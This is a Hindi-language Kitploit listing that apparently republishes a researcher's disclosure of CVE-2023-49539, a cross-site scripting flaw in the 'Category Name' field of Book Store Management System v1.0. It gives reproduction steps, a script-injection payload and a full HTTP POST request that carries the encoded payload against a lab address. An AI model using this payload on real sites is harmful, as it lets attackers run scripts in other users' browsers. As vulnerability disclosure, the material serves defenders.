Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49539 — Book Store Management System v1.0 - 'index.php/category' में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता - संवेदनशील फ़ील्ड: 'Category Name' | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49539
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-49539

CVE-2023-49539

Book Store Management System v1.0 - 'index.php/category' में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता - संवेदनशील फ़ील्ड: 'Category Name'

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49539

Book Store Management System v1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता "index.php/category" में - कमजोर फ़ील्ड: "श्रेणी का नाम"

विवरण: Book Store Management System v1.0 में "/bsms_ci/index.php/category" में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई। यह भेद्यता हमलावरों को "श्रेणी का नाम" फ़ील्ड में इंजेक्ट किए गए क्राफ्टेड पेलोड के माध्यम से मनमाने वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।

भेद्य उत्पाद संस्करण: Book Store Management System v1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 29/11/2023
पुष्टि की गई: 15/12/2023
CVE: CVE-2023-49539
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

यह भेद्यता "/bsms_ci/index.php/category/" पृष्ठ पर मौजूद है। विशेष रूप से, श्रेणी बनाते/संपादित करते समय, 'श्रेणी का नाम' फ़ील्ड को कमजोर पाया गया है। हमलावर श्रेणी निर्माण/संपादन प्रक्रिया के दौरान "श्रेणी का नाम" फ़ील्ड में क्रॉस-साइट स्क्रिप्टिंग (XSS) पेलोड इंजेक्ट करके इस भेद्यता का शोषण कर सकते हैं।

पेलोड:

root@kitploit:~
<\td><script>alert(document.domain)</script>

अनुरोध:

root@kitploit:~
POST /bsms_ci/index.php/category/category_update HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/category
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=72ruij3r4688s92v273ncnqjm150uvu8
Upgrade-Insecure-Requests: 1

category_code_lama=12&category_code=12&category_name=%3c%5ctd%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e&edit=Save

खोजकर्ता/क्रेडिट: Geraldo Alcântara

टूल डाउनलोड करें